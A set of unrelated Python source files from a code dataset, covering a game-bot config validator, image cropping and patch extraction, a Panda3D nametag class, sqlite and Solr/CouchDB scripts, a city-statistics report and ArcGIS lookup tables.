        if load.get(outer, {}).get(inner, None):
            task_configuration_error('{}.{}'.format(outer, inner))
            return None

    if (config.evolve_captured
        and (not isinstance(config.evolve_captured, str)
             or str(config.evolve_captured).lower() in ["true", "false"])):
        parser.error('"evolve_captured" should be list of pokemons: use "all" or "none" to match all ' +
                     'or none of the pokemons, or use a comma separated list such as "Pidgey,Weedle,Caterpie"')
        return None

    if not (config.location or config.location_cache):
        parser.error("Needs either --use-location-cache or --location.")
        return None

    if config.catch_randomize_reticle_factor < 0 or 1 < config.catch_randomize_reticle_factor:
        parser.error("--catch_randomize_reticle_factor is out of range! (should be 0 <= catch_randomize_reticle_factor <= 1)")
        return None

    if config.catch_randomize_spin_factor < 0 or 1 < config.catch_randomize_spin_factor:
        parser.error("--catch_randomize_spin_factor is out of range! (should be 0 <= catch_randomize_spin_factor <= 1)")
        return None

    # item list config verification
    item_list = json.load(open(os.path.join('data', 'items.json')))
    for config_item_name, bag_count in config.item_filter.iteritems():
        if config_item_name not in item_list.viewvalues():
            if config_item_name not in item_list:
                parser.error('item "' + config_item_name + '" does not exist, spelling mistake? (check for valid item names in data/items.json)')
                return None

    # create web dir if not exists
    try:
        os.makedirs(web_dir)
    except OSError:
        if not os.path.isdir(web_dir):
            raise

    # "all"/comma-separated strings become lists of pokemon names.
    if config.evolve_all and isinstance(config.evolve_all, str):
        config.evolve_all = [str(pokemon_name) for pokemon_name in config.evolve_all.split(',')]
    if config.evolve_captured and isinstance(config.evolve_captured, str):
        config.evolve_captured = [str(pokemon_name) for pokemon_name in config.evolve_captured.split(',')]

    fix_nested_config(config)
    return config
def add_config(parser, json_config, short_flag=None, long_flag=None, **kwargs):
    """Register an argparse option whose default may come from json_config.

    A dotted long flag such as "--forts.spin" is resolved against nested
    dictionaries in json_config before falling back to the coded default.
    """
    if not long_flag:
        raise Exception('add_config calls requires long_flag parameter!')
    path_parts = long_flag.split('--')[1].split('.')
    leaf_name = path_parts[-1]
    # Walk down into nested config sections for dotted flags; a plain flag
    # has no intermediate parts, so the loop simply does not run.
    for section in path_parts[:-1]:
        json_config = json_config.get(section, {})
    if 'default' in kwargs:
        kwargs['default'] = json_config.get(leaf_name, kwargs['default'])
    flags = (short_flag, long_flag) if short_flag else (long_flag,)
    parser.add_argument(*flags, **kwargs)
def fix_nested_config(config):
    """Rewrite dotted attribute names ("a.b") as underscored ones ("a_b").

    argparse stores dotted long flags under their dotted dest names, which
    cannot be accessed as plain attributes; fix them up in place.
    """
    config_dict = config.__dict__
    # BUG FIX: snapshot the items first -- the original iterated the live
    # dict (iteritems) while inserting and deleting keys, which corrupts or
    # aborts the iteration.
    for key, value in list(config_dict.items()):
        if '.' in key:
            config_dict[key.replace('.', '_')] = value
            del config_dict[key]
def parse_unicode_str(string):
    """Best-effort decode of *string* as UTF-8; return it unchanged on failure.

    BUG FIX: the original caught only UnicodeEncodeError, but .decode()
    raises UnicodeDecodeError for invalid byte sequences; UnicodeError is
    the common base class and covers both.
    """
    try:
        return string.decode('utf8')
    except UnicodeError:
        return string
if __name__ == '__main__':
main()
| StarcoderdataPython |
# Crop the same 512x512 window out of every experiment image so that the
# ground-truth, noisy, and denoised variants can be compared side by side.
# (BUG FIX: the first line carried a fused dataset-extraction id prefix
# that made it a syntax error.)
imgPaths = [
    'GroundTruth/DIV2K_0832',
    'Noisy/DIV2K_0832_gaussian',
    'Noisy/DIV2K_0832_poisson',
    'Noisy/DIV2K_0832_snp',
    'Denoised/DnCNN/DIV2K_0832_gaussian',
    'Denoised/DnCNN/DIV2K_0832_poisson',
    'Denoised/DnCNN/DIV2K_0832_snp',
    'Denoised/GaussianLP/DIV2K_0832_gaussian',
    'Denoised/GaussianLP/DIV2K_0832_poisson',
    'Denoised/GaussianLP/DIV2K_0832_snp',
    'Denoised/NLM/DIV2K_0832_gaussian',
    'Denoised/NLM/DIV2K_0832_poisson',
    'Denoised/NLM/DIV2K_0832_snp',
]
imgPaths = [x + '.bmp' for x in imgPaths]

# (left, upper, right, lower) box for PIL.Image.crop -- a 512x512 window.
CROP_BOX = (1527, 297, 1527 + 512, 297 + 512)

from os import path
from PIL import Image
from tqdm import tqdm

for imgPath in tqdm(imgPaths, ncols=80):
    img = Image.open('F:/nlm-cuda/experiment/' + imgPath)
    img = img.crop(CROP_BOX)
    # Flatten the relative path into a single file name inside Crop/.
    img.save(path.join('F:/nlm-cuda/experiment/Crop/', imgPath.replace('/', '-')))
| StarcoderdataPython |
import math
from panda3d.core import *
import NametagGlobals
from MarginPopup import MarginPopup
from Nametag import Nametag
from _constants import *
class Nametag2d(Nametag, MarginPopup):
    """2-D (on-screen margin) nametag.

    Draws a name card or chat balloon in screen space inside a margin cell
    and keeps an arrow rotated toward the avatar's world position.

    NOTE(review): this looks like a hand-decompiled port (``v10``/``v84``
    style locals, "XXX ... GUESS" markers below).  Behaviour is kept
    byte-identical here; only comments were added.
    """

    def __init__(self):
        Nametag.__init__(self, 8.075)
        MarginPopup.__init__(self)
        # NodePaths owned by this tag; torn down and rebuilt by updateContents().
        self.m_copied_np = None
        self.m_attached_np = None
        self.m_arrow = None
        self.m_unknown_np = None
        # self.setCullCallback()
        # Cull callback re-orients the arrow every frame this node is drawn.
        self.cbNode = CallbackNode(self.getName() + '-cbNode')
        self.cbNode.setCullCallback(PythonCallbackObject(self.cullCallback))
        self.addChild(self.cbNode)
        self.setName('unnamed')
        self.m_contents = 3
        self.m_chat_contents = 0
        self.updateContents()
        # Cache the global arrow toggle / margin sequence to detect changes.
        self.m_on = NametagGlobals._master_arrows_on
        self.m_seq2d = 0
        self.m_trans_vec = Vec3(0, 0, 0)

    def setVisible(self, value):
        # Visibility changes require regenerating the displayed geometry.
        self.m_visible = value
        self.updateContents()

    def manage(self, manager):
        # Register this popup with the margin manager.
        self.updateContents()
        manager.managePopup(self)

    def unmanage(self, manager):
        # Remove from both the nametag system and the margin manager.
        Nametag.unmanage(self, manager)
        manager.unmanagePopup(self)

    def setObjectCode(self, objcode):
        # Delegates to the owning group, if any.
        if self.m_group:
            self.m_group.setObjectCode(objcode)

    def getObjectCode(self):
        if self.m_group:
            return self.m_group.getObjectCode()
        return 0

    def getScore(self):
        # Priority for margin-cell allocation: closer avatars score higher.
        if self.m_group:
            return 1000 - self.getDistance2()
        return 0

    def getDistance2(self):
        """Squared distance from the local toon to this tag's avatar (0 if none)."""
        if self.m_avatar:
            np = self.m_avatar
        else:
            np = self.m_group.getAvatar()
        if np.isEmpty():
            return 0
        return np.getPos(NametagGlobals._toon).lengthSquared()

    def considerVisible(self):
        """Decide whether this 2-d tag should occupy a margin cell.

        Returns a truthy value when the tag should be shown; also refreshes
        the contents when the global arrow toggle or margin properties
        changed since the last call.
        """
        from NametagGroup import NametagGroup
        v2 = 0
        do_update = True
        if self.m_on != NametagGlobals._master_arrows_on:
            self.m_on = NametagGlobals._master_arrows_on
            v2 = 1
        if self.m_seq2d == NametagGlobals._margin_prop_seq:
            if not v2:
                do_update = False
        else:
            self.m_seq2d = NametagGlobals._margin_prop_seq
        if do_update:
            self.updateContents()
        if not self.m_chat_contents:
            return 0
        # Hidden when the 3-d tag is forced on, unless on-screen chat is forced.
        result = self.m_group.m_nametag3d_flag != 2
        if NametagGlobals._onscreen_chat_forced and self.m_chat_contents & (Nametag.CSpeech | Nametag.CThought):
            result = 1
            self.m_group.setNametag3dFlag(0)
        # Building tags are only shown within 40 units (40**2 == 1600).
        if result and self.m_group.getColorCode() in (NametagGroup.CCToonBuilding,
         NametagGroup.CCSuitBuilding,
         NametagGroup.CCHouseBuilding):
            return self.getDistance2() < 1600
        return result

    def updateContents(self):
        """Tear down the current geometry and rebuild name/chat as appropriate."""
        self.stopFlash()
        if self.m_group:
            self.setName(self.m_group.getName())
        else:
            self.setName('unnamed')
        if self.m_copied_np:
            self.m_copied_np.removeNode()
        if self.m_attached_np:
            self.m_attached_np.removeNode()
        if self.m_arrow:
            self.m_arrow.removeNode()
        if self.m_unknown_np:
            self.m_unknown_np.removeNode()
        self.m_chat_contents = self.determineContents()
        if not NametagGlobals._master_arrows_on:
            # Bit 0 appears to be the name/arrow bit; mask it off when
            # arrows are globally disabled.
            self.m_chat_contents = self.m_chat_contents & ~1
        if self.m_visible and self.isGroupManaged():
            v10 = self.m_chat_contents
            if v10 & Nametag.CSpeech:
                self.generateChat(NametagGlobals._speech_balloon_2d)
            elif v10 & Nametag.CThought:
                self.generateChat(NametagGlobals._thought_balloon_2d)
            elif v10 & Nametag.CName:
                self.generateName()

    def frameCallback(self):
        # Keep the popup's region sequence in sync with the group each frame.
        if self.m_visible and self.m_popup_region:
            self.m_seq = self.m_group.m_region_seq
        if self.m_group:
            self.m_group.updateRegions()

    def rotateArrow(self):
        """Point the 2-d arrow from the local toon toward this tag's avatar."""
        if not self.m_arrow:
            return
        if self.m_avatar:
            np = self.m_avatar
        else:
            np = self.m_group.getAvatar()
        if not np:
            return
        relpos = np.getPos(NametagGlobals._camera) - NametagGlobals._toon.getPos(NametagGlobals._camera)
        # Roll about the screen axis toward the target; atan2 gives radians.
        hpr = Vec3(0, 0, -math.atan2(relpos[1], relpos[0]) * 180 / math.pi)
        scale = Vec3(0.5, 0.5, 0.5)
        shear = Vec3(0, 0, 0)
        temp_mat_3 = Mat3()
        composeMatrix(temp_mat_3, scale, shear, hpr)
        arrow_mat = Mat4(temp_mat_3, self.m_trans_vec)
        self.m_arrow.setMat(arrow_mat)

    def generateName(self):
        """Build the name card geometry, text, optional arrow, and click region.

        Local naming (from the decompile): v84 = text foreground colour,
        v75 = card background colour, v67/v68 = padded top/bottom of the
        name frame, v69/a3 = scale+offset matrix fitting the card into the
        margin cell.
        """
        v4 = self.getState()
        v84 = Vec4(NametagGlobals.getNameFg(self.m_group.getColorCode(), v4))
        v75 = Vec4(NametagGlobals.getNameBg(self.m_group.getColorCode(), v4))
        # Clamp background alpha into the allowed 2-d range.
        v75[3] = max(v75[3], NametagGlobals._min_2d_alpha)
        v75[3] = min(v75[3], NametagGlobals._max_2d_alpha)
        v67 = NametagGlobals._card_pad[3] + self.m_group.m_name_frame[3]
        v68 = self.m_group.m_name_frame[2] - NametagGlobals._card_pad[2]
        wordwrap = self.m_group.getNameWordwrap()
        v17 = self.m_cell_width / wordwrap * 2.0
        v66 = 0.333 * (1.0 / v17) - (v68 + v67) * 0.5
        v18 = min(1.0 / v17 - v67, v66)
        v69 = Mat4(v17, 0, 0, 0,
                   0, v17, 0, 0,
                   0, 0, v17, 0,
                   0, 0, v18 * v17, 1.0)
        a3 = v69
        if v75[3] != 0.0:
            # Only generate the background card if it is at all visible.
            card = CardMaker('nametag')
            card.setFrame(self.m_group.m_name_frame[0] - NametagGlobals._card_pad[0],
                          self.m_group.m_name_frame[1] + NametagGlobals._card_pad[1],
                          v68, v67)
            card.setColor(v75)
            if NametagGlobals._nametag_card:
                card.setSourceGeometry(NametagGlobals._nametag_card.node(),
                                       NametagGlobals._nametag_card_frame)
            self.m_attached_np = self.m_np.attachNewNode(card.generate())
            self.m_attached_np.setMat(v69)
            if v75[3] != 1.0:
                self.m_attached_np.setTransparency(1)
            if self.m_has_draw_order:
                bin = config.GetString('nametag-fixed-bin', 'fixed')
                self.m_attached_np.setBin(bin, self.m_draw_order)
        # Copy the group's name text under this tag and colour it.
        self.m_copied_np = self.m_group.copyNameTo(self.m_np)
        self.m_copied_np.setMat(a3)
        if self.m_has_draw_order:
            bin = config.GetString('nametag-fixed-bin', 'fixed')
            self.m_copied_np.setBin(bin, self.m_draw_order)
        self.m_copied_np.setColor(v84)
        if v84[3] != 1.0:
            self.m_copied_np.setTransparency(1)
        reducer = SceneGraphReducer()
        reducer.applyAttribs(self.m_copied_np.node())
        reducer.applyAttribs(self.m_attached_np.node())
        if NametagGlobals._arrow_model:
            self.m_arrow = NametagGlobals._arrow_model.copyTo(self.m_np)
            if self.m_has_draw_order:
                bin = config.GetString('nametag-fixed-bin', 'fixed')
                self.m_arrow.setBin(bin, self.m_draw_order)
            # Arrow sits just below the card; rotateArrow() uses this offset.
            self.m_trans_vec = a3.xformPoint(Point3(0, 0, v68 - 1.0))
            color = Vec4(NametagGlobals.getArrowColor(self.m_group.getColorCode()))
            self.m_arrow.setColor(color)
            if color[3] != 1.0:
                self.m_arrow.setTransparency(1)
            self.rotateArrow()
        elif self.m_arrow:
            self.m_arrow.removeNode()
        # Transform the padded name frame into net coordinates to form the
        # clickable screen region.
        v69 = self.m_np.getNetTransform().getMat()
        v69 = a3 * v69
        v77 = v69.xformPoint(Point3(self.m_group.m_name_frame[0] - NametagGlobals._card_pad[0], 0, v68))
        v80 = v69.xformPoint(Point3(self.m_group.m_name_frame[1] + NametagGlobals._card_pad[1], 0, v67))
        frame = Vec4(v77[0], v80[0], v77[2], v80[2])
        self.setRegion(frame, 0)

    def generateChat(self, balloon):
        """Build a 2-d chat balloon (speech or thought) plus its click region.

        *balloon* is one of the global 2-d balloon generators.  Several
        constants below are flagged as guesses by the original author.
        """
        v5 = self.getState()
        text_color = Vec4(NametagGlobals.getChatFg(self.m_group.getColorCode(), v5))
        balloon_color = Vec4(NametagGlobals.getChatBg(self.m_group.getColorCode(), v5))
        if self.m_group.m_chat_flags & CFQuicktalker:
            balloon_color = Vec4(self.m_group.getQtColor())
        balloon_color[3] = max(balloon_color[3], NametagGlobals._min_2d_alpha)
        balloon_color[3] = min(balloon_color[3], NametagGlobals._max_2d_alpha)
        text = self.m_group.getChat()
        if self.m_group.m_name:
            text = '%s: %s' % (self.m_group.m_name, text)
        # Page/quit buttons only appear on non-timing-out, multi-page chat;
        # the quit button replaces the page button on the last page.
        has_page_button = False
        has_quit_button = False
        if not self.m_group.m_has_timeout:
            has_page_button = self.m_group.m_chat_flags & CFPageButton
            if self.m_group.getPageNumber() >= self.m_group.getNumChatPages() - 1:
                if self.m_group.m_chat_flags & CFQuitButton:
                    has_page_button = False
                    has_quit_button = True
        page_button = None
        if has_page_button:
            page_button = NametagGlobals.getPageButton(v5)
        elif has_quit_button:
            page_button = NametagGlobals.getQuitButton(v5)
        reversed = self.m_group.m_chat_flags & CFReversed
        new_button = [None]
        balloon_result = balloon.generate(text, self.m_group.getChatFont(), self.m_wordwrap,
                                          text_color, balloon_color, False,
                                          self.m_has_draw_order, self.m_draw_order,
                                          page_button, self.m_group.willHaveButton(),
                                          reversed, new_button)
        self.m_unknown_np = self.m_np.attachNewNode(balloon_result)
        v88 = 8.0 # XXX THIS IS A GUESS
        v49 = 2 * self.m_cell_width
        a6 = v49 / (v88 + 1.0)
        # Center the balloon in the cell: v113/v51 are the x/z offsets.
        v50 = balloon.m_text_height * balloon.m_hscale
        v85 = balloon.m_hscale * 5.0
        v88 = v50 * 0.5
        v113 = -(balloon.m_hscale * 0.5 + v85)
        v51 = -(NametagGlobals._balloon_text_origin[2] + v88)
        v118 = Mat4(a6, 0, 0, 0,
                    0, a6, 0, 0,
                    0, 0, a6, 0,
                    v113 * a6, 0, v51 * a6, 1.0)
        self.m_unknown_np.setMat(v118)
        reducer = SceneGraphReducer()
        reducer.applyAttribs(self.m_unknown_np.node())
        v66 = self.m_np.getNetTransform().getMat()
        # XXX THE LINES BELOW ARE A GUESS
        v67 = v113 * a6
        v68 = v51 * a6
        v94 = v66.xformPoint(Point3(v67, 0.0, v68))
        v97 = v66.xformPoint(Point3(-v67, 0.0, -v68))
        frame = Vec4(v94[0], v97[0], v94[2], v97[2])
        self.setRegion(frame, 0)

    def cullCallback(self, *args):
        # Runs whenever the node is traversed for drawing: keep the arrow
        # pointing at the avatar and the region sequence current.
        self.rotateArrow()
        if self.m_visible and self.m_popup_region:
            self.m_seq = self.m_group.getRegionSeq()
| StarcoderdataPython |
5133790 | #adding data to the database
import sqlite3

# Add one row to the employees table in employee.db.
conn = sqlite3.connect('employee.db')
c = conn.cursor()
# IF NOT EXISTS keeps the script re-runnable: the original CREATE TABLE had
# been commented out after the first run, which made the INSERT below fail
# against a fresh database file.
c.execute("""CREATE TABLE IF NOT EXISTS employees (
            first text,
            last text,
            pay integer
            )""")
# Insert the employee's first name, last name and pay.  Placeholders are
# used instead of values embedded in the SQL string as a matter of
# sqlite3 hygiene.
c.execute("INSERT INTO employees VALUES (?, ?, ?)",
          ('Hoping', 'Grasshopper', 5000))
conn.commit()
conn.close()
# After this runs, the row is persisted in the employee.db file.
| StarcoderdataPython |
1839169 | # pylint: disable=missing-docstring
# Pylint functional-test fixture: the trailing `pass` is redundant because
# the `except` body already contains a statement, so pylint is expected to
# emit the message named in the bracketed comment below.  Do not "fix" the
# code -- the redundancy is the point of the test.
try:
    A = 2
except ValueError:
    A = 24
    pass # [unnecessary-pass]
| StarcoderdataPython |
6493528 | # -*- coding: utf-8 -*-
import argparse
# Python 3 ships configparser; fall back to the Python 2 module name.
# Catch ImportError specifically so that unrelated failures inside the
# module are not silently masked by the old bare `except:`.
try:
    import configparser
except ImportError:
    import ConfigParser as configparser
from get_solr_json import get_solr_json
import requests
if __name__ == '__main__':
    # Compare the CouchDB documents of one collection against the Solr
    # index and print the couch ids missing from Solr.
    parser = argparse.ArgumentParser()
    parser.add_argument('collection_id')
    parser.add_argument(
        'outdir',
        nargs=1, )
    argv = parser.parse_args()

    config = configparser.SafeConfigParser()
    config.read('report.ini')
    solr_url = config.get('new-index', 'solrUrl')
    api_key = config.get('new-index', 'solrAuth')
    couchdb_url = config.get('couchdb', 'url')

    cid = argv.collection_id
    url_couchdb_collection_ids = '{}/couchdb/ucldc/_design/all_provider_docs' \
        '/_view/by_provider_name?key="{}"'.format(couchdb_url, cid)
    print("URL:{}".format(url_couchdb_collection_ids))
    # may need to do paging here
    # NOTE(review): verify=False disables TLS certificate checking --
    # confirm this is intentional for the couchdb host.
    resp = requests.get(url_couchdb_collection_ids, verify=False)
    rows = resp.json()['rows']
    couchdb_ids = [x['id'] for x in rows]

    # Page through Solr with a cursor to collect every harvest id for the
    # collection.  (The duplicate re-reads of solrUrl/solrAuth that used to
    # sit here were redundant and have been removed.)
    solr_query = {
        'rows': 100,
        'sort': 'id asc',
        'fl': 'harvest_id_s',
        'q':
        'collection_url:"https://registry.cdlib.org/api/v1/collection/{}/"'.
        format(cid),
        'cursorMark': '*'
    }
    solr_ids = []
    while True:
        solr_json = get_solr_json(solr_url, solr_query, api_key=api_key)
        solr_docs = solr_json['response']['docs']
        if not solr_docs:
            break
        solr_query['cursorMark'] = solr_json['nextCursorMark']
        solr_ids.extend([x['harvest_id_s'] for x in solr_docs])

    # Set membership is O(1); the previous list scan was O(n) per id.
    solr_id_set = set(solr_ids)
    not_in_solr = [couchid for couchid in couchdb_ids
                   if couchid not in solr_id_set]
    print(not_in_solr)
# Copyright © 2016, Regents of the University of California
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the University of California nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
| StarcoderdataPython |
3457676 | <gh_stars>10-100
'''analyze WORKING/samples2/train.csv (the training data) to select cities used to build local models
Summarize samples2/train.csv, select 12 cities
and use the summary to create a table of cities ordered by number of trades
INVOCATION
python select-cities2.py n_cities [--test] [--trace]
INPUTS
WORKING/samples2/train.csv
OUTPUTS
WORKING/select-cities2/city-medianprice-ntrades.csv
WORKING/select-cities2/city-medianprice-ntrades-all.txt
WORKING/select-cities2/city-medianprice-ntrades-selected.txt
WORKING/select-cities2/0log.txt
'''
from __future__ import division
import argparse
import collections
import json
import numpy as np
import os
import pandas as pd
import pdb
from pprint import pprint
import random
import sys
import arg_type
from Bunch import Bunch
import columns_table
from ColumnsTable import ColumnsTable
import dirutility
import layout_transactions
from Logger import Logger
from Path import Path
from Report import Report
from Timer import Timer
def make_control(argv):
'return a Bunch'
print argv
parser = argparse.ArgumentParser()
parser.add_argument('--test', action='store_true')
parser.add_argument('--trace', action='store_true')
arg = parser.parse_args(argv)
arg.me = parser.prog.split('.')[0]
if arg.trace:
pdb.set_trace()
random_seed = 123
random.seed(random_seed)
np.random.seed(random_seed)
dir_working = Path().dir_working()
dir_out = os.path.join(dir_working, arg.me + ('-test' if arg.test else ''))
dirutility.assure_exists(dir_out)
base = 'city_medianprice_ntrades'
base_all = base + '_all'
base_selected = base + '_selected'
return Bunch(
arg=arg,
path_in_column_defs=os.path.join('column_defs.json'),
path_in_samples=os.path.join(dir_working, 'samples2', 'train.csv'),
path_out_csv_all=os.path.join(dir_out, base_all + '.csv'),
path_out_csv_selected=os.path.join(dir_out, base_selected + '.csv'),
path_out_report_all=os.path.join(dir_out, base_all + '.txt'),
path_out_report_selected=os.path.join(dir_out, base_selected + '.txt'),
path_out_log=os.path.join(dir_out, '0log.txt'),
random_seed=random_seed,
timer=Timer(),
)
def etl(path_in, nrows, test):
'return DataFrames with columns city, median price, n trades: all and those selected'
'''return (median_price OrderedDict[city] float, n_cities OrderedDict[city] float)'''
city_column = layout_transactions.city
price_column = layout_transactions.price
extracted = pd.read_csv(
path_in,
nrows=nrows,
usecols=[city_column, price_column],
low_memory=False
)
print 'read %d samples from file %s' % (len(extracted), path_in)
# build columns for the DataFrame result
distinct_cities = set(extracted[city_column])
selected_n_trades = (
277, 296, 303, 351, # about half the median
638, 640, 642, 660, # about the median number of trades (median is 641)
4480, 5613, 10610, 22303, # largest number of trades
)
cities = []
median_prices = np.empty(len(distinct_cities))
n_trades = np.empty(len(distinct_cities))
selecteds = []
for i, city in enumerate(distinct_cities):
mask = extracted[city_column] == city
in_city = extracted.loc[mask]
assert len(in_city) > 0, city
cities.append(city)
median_prices[i] = in_city.median()
n_trades[i] = len(in_city)
selecteds.append(True if test else len(in_city) in selected_n_trades)
# check that the counting by city is reasonable
print 'sorted(n_trades)'
print sorted(n_trades)
print 'median', np.median(n_trades)
if not test:
assert sum(n_trades) == len(extracted)
for selected_n_trade in selected_n_trades:
assert selected_n_trade in n_trades, selected_n_trade
result_all = pd.DataFrame(
data={
'city': cities,
'median_price': median_prices,
'n_trades': n_trades,
'selected': selecteds,
},
index=cities,
)
result_selected = result_all.loc[result_all.selected]
result_all_sorted = result_all.sort_values('n_trades')
result_selected_sorted = result_selected.sort_values('n_trades')
print result_selected_sorted
return result_all_sorted, result_selected_sorted
def do_work(control):
    """Summarize the samples into CSV files and formatted text reports."""
    def make_indices(ordered_dict):
        """Return (OrderedDict[key] -> value / median value, median value).

        NOTE(review): defined but never called inside this function --
        confirm whether it is dead code before removing.
        """
        values = np.empty(len(ordered_dict), dtype=float)
        for i, value in enumerate(ordered_dict.values()):
            values[i] = value
        median_value = np.median(values)
        result = collections.OrderedDict()
        for k, v in ordered_dict.iteritems():
            result[k] = v / median_value
        return result, median_value
    # In --test mode only the first 10 samples are read.
    df_all, df_selected = etl(
        control.path_in_samples,
        10 if control.arg.test else None,
        control.arg.test,
    )
    df_all.to_csv(control.path_out_csv_all)
    df_selected.to_csv(control.path_out_csv_selected)
    with open(control.path_in_column_defs, 'r') as f:
        column_defs = json.load(f)
    pprint(column_defs)
    def make_generate_data(df):
        """Return a generator factory yielding each detail row of *df*."""
        def generate_data():
            for i, row in df.iterrows():
                yield row
        return generate_data
    def create_and_write(df, path, header_lines, selected_columns):
        """Render *df* as a columns_table report and write it to *path*."""
        lines = columns_table.columns_table(
            make_generate_data(df)(),
            selected_columns,
            column_defs,
            header_lines,
        )
        with open(path, 'w') as f:
            for line in lines:
                f.write(line)
    create_and_write(
        df_all,
        control.path_out_report_all,
        ['Count of Trades in All Cities', 'Ordered by Count of Number of Trades'],
        ['city', 'median_price', 'n_trades', 'selected'],
    )
    create_and_write(
        df_selected,
        control.path_out_report_selected,
        ['Count of Trades in Selected Cities', 'Ordered by Count of Number of Trades'],
        ['city', 'median_price', 'n_trades'],
    )
def main(argv):
control = make_control(argv)
sys.stdout = Logger(control.path_out_log) # now print statements also write to the log file
print control
lap = control.timer.lap
do_work(control)
lap('work completed')
if control.arg.test:
print 'DISCARD OUTPUT: test'
print control
print 'done'
return
if __name__ == '__main__':
    if False:
        # avoid pyflakes warnings
        # (dead branch that "uses" pdb and pprint so the imports are not
        # flagged as unused; never executed)
        pdb.set_trace()
        pprint()
    main(sys.argv[1:])
| StarcoderdataPython |
9718961 | # -*- coding: utf-8 -*-
from .dec import DecFileParser
from .enums import known_decay_models
# The package's public API: the .dec file parser and the list of known
# decay models re-exported above.
__all__ = ("DecFileParser", "known_decay_models")
| StarcoderdataPython |
# Lookup tables for scripting ArcGIS map layouts.  (The original first line
# was fused with a dataset-id marker, which made the file a syntax error.)

# arcpy layout-element type names (English and German UI variants) mapped
# to the ArcObjects element-type constants.
dict_arcpy_arcObj_types = {
    "Text": "TEXT_ELEMENT",
    "Data Frame": "DATAFRAME_ELEMENT",
    "Map Surround Frame": "MAPSURROUND_ELEMENT",
    "Kartenumgebungsrahmen": "MAPSURROUND_ELEMENT",
    "Legend": "LEGEND_ELEMENT",
    "North Arrow": "MAPSURROUND_ELEMENT",
    "Scale Bar": "MAPSURROUND_ELEMENT",
    "Rectangle": "GRAPHIC_ELEMENT",
    "Rechteck": "GRAPHIC_ELEMENT",
    'Ellipse': 'GRAPHIC_ELEMENT',
    'Circle': 'GRAPHIC_ELEMENT',
    'Kreis': 'GRAPHIC_ELEMENT',
    'Polygon': 'GRAPHIC_ELEMENT',
    "Line": "GRAPHIC_ELEMENT",
    "Linie": "GRAPHIC_ELEMENT",
    "Picture": "PICTURE_ELEMENT",
    "Bild": "PICTURE_ELEMENT",
}

# Numeric unit codes mapped to unit abbreviations.
dict_units = {
    0: "Unknown",
    1: "In",
    2: "Pt",
    3: "Ft",
    4: "Yd",
    5: "MI",
    6: "SM",
    7: "MM",
    8: "CM",
    9: "M",
    10: "KM",
    11: "DD",
    12: "DM",
}

# Scale-bar style code -> vertical position flag (as a string).
dict_vertical_position = {
    0: '0',
    1: '0',
    2: '0',
    3: '1',
    4: '1',
}

# Scale-bar style code -> tick line style name.
dict_line_style = {
    0: 'Line Ticks Up',
    1: 'Line Ticks Up',
    2: 'Line Ticks Middle',
    3: 'Line Ticks Down',
    4: 'Line Ticks Down',
}

# Graphic shape name (English/German) -> geometry type code (as a string).
dict_geometry = {
    'Rectangle': '1',
    'Rechteck': '1',
    'Ellipse': '0',
    'Circle': '0',
    'Kreis': '0',
    'Polygon': '2',
}
| StarcoderdataPython |
6523126 | import os
import random
import pickle
import math
import tensorflow as tf
import cv2
import numpy as np
import matplotlib.pyplot as plt
def random_crop(src, size):
    """Return a random (size[0] wide x size[1] tall) window of image *src*.

    :param src: HxWxC (or HxW) array-like image
    :param size: (width, height) of the crop
    :return: the cropped view of *src*
    """
    height = src.shape[0]
    width = src.shape[1]
    # randint is inclusive on both ends, so the maximum start offsets are
    # width - size[0] / height - size[1].  (The old "- 1" both excluded
    # the last valid placement and raised ValueError when src was exactly
    # the requested size.)
    max_right = width - size[0]
    max_bottom = height - size[1]
    x = random.randint(0, max_right)
    y = random.randint(0, max_bottom)
    cropped = src[y: y + size[1], x: x + size[0]]
    return cropped
def extract_patch_list(src, size, stride):
    """Collect (size[0] x size[1]) patches sampled every *stride* pixels.

    Patches are emitted row-major: top-to-bottom, left-to-right.
    """
    size_w, size_h = size[0], size[1]
    stride_w, stride_h = stride[0], stride[1]
    n_rows = (src.shape[0] - size_h) // stride_h
    n_cols = (src.shape[1] - size_w) // stride_w
    patches = []
    for row in range(n_rows):
        top = row * stride_h
        for col in range(n_cols):
            left = col * stride_w
            patches.append(src[top: top + size_h, left: left + size_w])
    return patches
def load_img_list(dir_path):
    """Read every file in *dir_path* and return them as RGB images."""
    images = []
    for name in os.listdir(dir_path):
        # cv2 loads BGR; convert so downstream code sees RGB.
        bgr = cv2.imread("{}/{}".format(dir_path, name))
        images.append(cv2.cvtColor(bgr, cv2.COLOR_BGR2RGB))
    return images
def load_img_list_and_extract_patch_list(dir_path, size, stride):
    """Load every image under *dir_path* and gather all patches from each."""
    all_patches = []
    for img in load_img_list(dir_path):
        all_patches.extend(extract_patch_list(img, size, stride))
    return all_patches
def blur_img_list(img_list, scale=2):
    """Blur each image by bicubic down-scaling 1/scale, then up-scaling back."""
    blurred = []
    for img in img_list:
        height = img.shape[0]
        width = img.shape[1]
        small = cv2.resize(img, (round(width / scale), round(height / scale)),
                           interpolation=cv2.INTER_CUBIC)
        restored = cv2.resize(small, (width, height),
                              interpolation=cv2.INTER_CUBIC)
        blurred.append(restored)
    return blurred
"""
Model
"""
